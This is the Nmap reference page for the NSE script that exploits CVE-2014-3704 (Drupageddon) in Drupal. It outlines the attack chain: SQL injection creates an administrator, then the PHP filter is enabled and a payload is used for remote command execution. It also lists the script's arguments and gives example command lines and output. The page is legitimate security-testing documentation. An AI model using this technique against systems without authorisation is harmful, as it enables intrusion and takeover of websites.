Script http-vuln-cve2014-3704

Script types: portrule
Categories: vuln, intrusive, exploit
Download: https://svn.nmap.org/nmap/scripts/http-vuln-cve2014-3704.nse

Script Summary

Exploits CVE-2014-3704 also known as 'Drupageddon' in Drupal. Versions < 7.32 of Drupal core are known to be affected.

Vulnerability allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.

The script injects new Drupal administrator user via login form and then it attempts to log in as this user to determine if target is vulnerable. If that's the case following exploitation steps are performed:

• PHP filter module which allows embedded PHP code/snippets to be evaluated is enabled,
• permission to use PHP code for administrator users is set,
• new article which contains payload is created & previewed,
• cleanup: by default all DB records that were added/modified by the script are restored.

Vulnerability originally discovered by Stefan Horst from SektionEins.

Exploitation technique used to achieve RCE on the target is based on exploit/multi/http/drupal_drupageddon Metasploit module.

See also:

• http-sql-injection.nse

Script Arguments

http-vuln-cve2014-3704.uri

Drupal root directory on the website. Default: /

http-vuln-cve2014-3704.cmd

Shell command to execute. Default: nil

http-vuln-cve2014-3704.cleanup

Indicates whether cleanup (removing DB records that was added/modified during exploitation phase) will be done. Default: true

slaxml.debug

See the documentation for the slaxml library.

http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

vulns.short, vulns.showall

See the documentation for the vulns library.

Example Usage

nmap --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.cmd="uname -a",http-vuln-cve2014-3704.uri="/drupal" <target>
nmap --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.uri="/drupal",http-vuln-cve2014-3704.cleanup=false <target>

Script Output

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-vuln-cve2014-3704:
|   VULNERABLE:
|   Drupal - pre Auth SQL Injection Vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-3704
|       The expandArguments function in the database abstraction API in
|       Drupal core 7.x before 7.32 does not properly construct prepared
|       statements, which allows remote attackers to conduct SQL injection
|       attacks via an array containing crafted keys.
|
|     Disclosure date: 2014-10-15
|     Exploit results:
|       Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64 GNU/Linux
|     References:
|       https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
|       https://www.drupal.org/SA-CORE-2014-005
|       http://www.securityfocus.com/bid/70595
|_      https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3704

Requires

• http
• shortport
• stdnse
• string
• table
• url
• vulns
• openssl
• rand

---

Author:

• Mariusz Ziulek <mzet()owasp org>

License: Same as Nmap--See https://nmap.org/book/man-legal.html